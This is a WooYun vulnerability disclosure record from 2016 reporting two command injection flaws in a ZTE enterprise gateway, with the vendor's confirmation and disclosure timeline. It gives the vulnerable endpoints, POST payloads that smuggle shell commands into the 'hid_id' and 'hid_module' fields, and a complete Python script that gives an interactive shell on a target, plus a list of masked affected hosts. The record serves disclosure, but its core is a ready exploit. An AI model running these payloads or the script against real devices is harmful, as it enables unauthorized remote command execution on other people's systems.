当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198315

漏洞标题:中兴某企业网关系统存在两个命令执行漏洞

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2016-04-19 21:48

修复时间:2016-07-19 09:00

公开时间:2016-07-19 09:00

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-06-14: 细节向核心白帽子及相关领域专家公开
2016-06-24: 细节向普通白帽子公开
2016-07-04: 细节向实习白帽子公开
2016-07-19: 细节向公众公开

简要描述:

中兴某企业网关系统存在两个命令执行漏洞

详细说明:

经测试发现,该设备还存在两处任意命令执行

/modules/service/voip_eone.be.php
/modules/audit/audit_status.be.php


0x1 /modules/service/voip_eone.be.php
访问上述URL,然后post如下内容即可:
action=delete&hid_id=w||whoami>/usr/www/html/wy.txt||y
0x2 /modules/audit/audit_status.be.php
同样访问上述url,然后post数据:
action=start&hid_module=w||id>/usr/www/html/wy.txt||y
同样修改上个漏洞的exp,即可

#!/usr/bin/python
import os
import sys
import requests
import requests.packages.urllib3.util.ssl_
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'ALL'
host = sys.argv[1]
#host = "**.**.**.**"
if 'http' not in host: os._exit('error')
def exp(cmd):
path = "/modules/service/voip_eone.be.php"
# action=delete&hid_id=w||whoami>/usr/www/html/xx.txt||y
pars = {
"action" : "delete",
"hid_id" : "x||{}>/usr/www/html/.txt||x".format(cmd)
}
url = "{}{}".format(host,path)
#print url
#os._exit(0)
try:
req = requests.post(url, data=pars, verify=False)
tmp = "{}/.txt".format(host)
req = requests.get(tmp,verify=False)
if req.status_code == 200:
print req.content

except:
print 'url error'

while True:
cmd = raw_input('bash-$ ')
if cmd == 'q':
break
exp(cmd)

漏洞证明:

随便选取几个案例,运行exp即可利用
python exp.py **.**.**.**/

1.png


python exp.py **.**.**.**/

2.png


其他一些案例:

**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-20 08:56

厂商回复:

谢谢提交~

最新状态:

暂无